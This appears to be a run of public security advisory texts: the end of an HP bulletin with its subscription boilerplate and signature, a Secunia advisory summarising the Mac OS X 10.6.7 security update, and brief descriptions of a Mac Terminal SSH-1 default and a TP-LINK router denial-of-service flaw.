installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." Copyright 2011 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk2Hc7gACgkQ4B86/C0qfVmbswCgxy1tw165EpDQohbsigBboD52 60QAoN86XN6RKoIdtGzCCx64rePwzmNc =dgb3 -----END PGP SIGNATURE-----

The default configuration of Terminal in Apple Mac OS X 10.6 before 10.6.7 uses SSH protocol version 1 within the New Remote Connection dialog, which might make it easier for man-in-the-middle attackers to spoof SSH servers by leveraging protocol vulnerabilities. Mac OS X is prone to a remote security vulnerability. ---------------------------------------------------------------------- Meet Secunia @ Microsoft Management Summit (MMS) in Las Vegas, USA (21-25 March). http://secunia.com/company/events/mms_2011/ ---------------------------------------------------------------------- TITLE: Apple Mac OS X Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43814 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43814/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43814 RELEASE DATE: 2011-03-22 DISCUSS ADVISORY: http://secunia.com/advisories/43814/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43814/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43814 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities. 1) A divide-by-zero error in AirPort when handling Wi-Fi frames can be exploited to cause a system reset. 2) Multiple vulnerabilities in Apache can be exploited by malicious people to disclose potentially sensitive information and by malicious users and malicious people to cause a DoS (Denial of Service). For more information: SA40206 3) A format string error within AppleScript Studio when handling certain commands via dialogs can be exploited to potentially execute arbitrary code. 4) An unspecified error in the handling of embedded OpenType fonts in Apple Type Services (ATS) can be exploited to cause a heap-based buffer overflow when a specially crafted document is viewed or downloaded. 5) Multiple unspecified errors in the handling of embedded TrueType fonts in Apple Type Services (ATS) can be exploited to cause a buffer overflow when a specially crafted document is viewed or downloaded. 6) Multiple unspecified errors in the handling of embedded Type 1 fonts in Apple Type Services (ATS) can be exploited to cause a buffer overflow when a specially crafted document is viewed or downloaded. 7) Multiple unspecified errors in the handling of SFNT tables in embedded fonts in Apple Type Services (ATS) can be exploited to cause a buffer overflow when a specially crafted document is viewed or downloaded. 8) An integer overflow error in bzip2 can be exploited to terminate an application using the library or execute arbitrary code via a specially crafted archive. For more information: SA41452 9) An error within the "FSFindFolder()" API in CarbonCore when used with the "kTemporaryFolderType" flag can be exploited to disclose the contents of arbitrary directories. 10) Multiple errors in ClamAV can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. For more information: SA41503 SA42426 11) An unspecified error in the handling of embedded fonts in CoreText can be exploited to corrupt memory when a specially crafted document is viewed or downloaded. 12) An integer overflow error within the handling of the F_READBOOTSTRAP ioctl in HFS, HFS+, and HFS+J filesystems can be exploited to read arbitrary files. 13) An error in ImageIO within the handling of JPEG files can be exploited to cause a heap-based buffer overflow. 14) An integer overflow error in ImageIO within the handling of XBM files can be exploited to potentially execute arbitrary code. 15) An error in libTIFF within the handling of JPEG encoded TIFF files can be exploited to cause a buffer overflow. 16) An error in libTIFF within the handling of CCITT Group 4 encoded TIFF files can be exploited to cause a buffer overflow. 17) An integer overflow error in ImageIO within the handling of JPEG encoded TIFF files can be exploited to potentially execute arbitrary code. 18) Multiple errors in Image RAW when handling Canon RAW image files can be exploited to cause buffer overflows. 19) An error in the Install Helper when handling URLs can be exploited to install an arbitrary agent by tricking the user into visiting a malicious website. 20) Multiple errors in Kerberos can be exploited by malicious users and malicious people to conduct spoofing attacks and bypass certain security features. For more information: SA37977 SA42396 21) An error within the "i386_set_ldt()" system call can be exploited by malicious, local users to execute arbitrary code with system privileges. 22) An integer truncation error within Libinfo when handling NFS RPC packets can be exploited to cause NFS RPC services to become unresponsive. 23) An error exists in the libxml library when traversing the XPath. For more information: SA42175 24) A double free error exists in the libxml library when handling XPath expressions. For more information: SA42721 25) Two errors in Mailman can be exploited by malicious users to conduct script insertion attacks. For more information: SA41265 26) Multiple errors in PHP can be exploited by malicious users and malicious people to bypass certain security restrictions and by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. For more information: SA39573 SA41724 27) Multiple errors in PHP can be exploited by malicious users and malicious people to bypass certain security restrictions. For more information: SA41724 28) An error in the OfficeImport framework when processing records containing formulas shared between multiple cells can be exploited to corrupt memory and potentially execute arbitrary code. 29) An error in QuickLook when handling certain Microsoft Office files can be exploited to corrupt memory when a specially crafted document is downloaded. 30) Multiple unspecified errors in QuickTime when handling JPEG2000, FlashPix, and panorama atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to corrupt memory via specially crafted files. 31) An integer overflow error in QuickTime when handling certain movie files can be exploited to potentially execute arbitrary code when a specially crafted file is viewed. 32) An error within QuickTime plug-in when handling cross-site redirects can be exploited to disclose video data. 33) An integer truncation error within the Ruby BigDecimal class can be exploited to potentially execute arbitrary code. This vulnerability only affects 64-bit Ruby processes. 34) A boundary error in Samba can be exploited by malicious people to potentially compromise a vulnerable system. For more information: SA41354 35) A security issue in Subversion can be exploited by malicious people to bypass certain security restrictions. 37) Some vulnerabilities in FreeType can be exploited to cause a DoS (Denial of Service) or potentially compromise an application using the library. For more information: SA41738 SOLUTION: Update to version 10.6.7 or apply Security Update 2011-001. PROVIDED AND/OR DISCOVERED BY: 15, 16, 33) Reported by the vendor. The vendor credits: 3) Alexander Strange. 5) Christoph Diehl of Mozilla, Felix Grobert of the Google Security Team, Marc Schoenefeld of Red Hat Security Response Team, and Tavis Ormandy and Will Drewry of Google Security Team. 6) Felix Grobert, Google Security Team and geekable via ZDI. 7) Marc Schoenefeld, Red Hat Security Response Team. 11) Christoph Diehl, Mozilla. 12) Dan Rosenberg, Virtual Security Research. 13) Andrzej Dyjak via iDefense. 14) Harry Sintonen. 17) Dominic Chell, NGS Secure. 18) Paul Harrington, NGS Secure. 19) Aaron Sigel, vtty.com. 21) Jeff Mears. 22) Peter Schwenk, University of Delaware. 28) Tobias Klein via iDefense. 29) Charlie Miller and Dion Blazakis via ZDI. 30) Will Dormann of CERT/CC, Damian Put and an anonymous researcher via ZDI, and Rodrigo Rubira Branco of Check Point Vulnerability Discovery Team. 31) Honggang Ren, Fortinet's FortiGuard Labs. 32) Nirankush Panchbhai and Microsoft Vulnerability Research (MSVR). 36) Matt Warren, HNW Inc. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT4581 iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=898 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The TP-LINK TL-WR740N is a wireless router device. The TP-LINK TL-WR740N device has an unspecified error when processing the request. The attacker can send a large number of packets to make the WebConsole and UPnP services unstable. Caused a denial of service attack.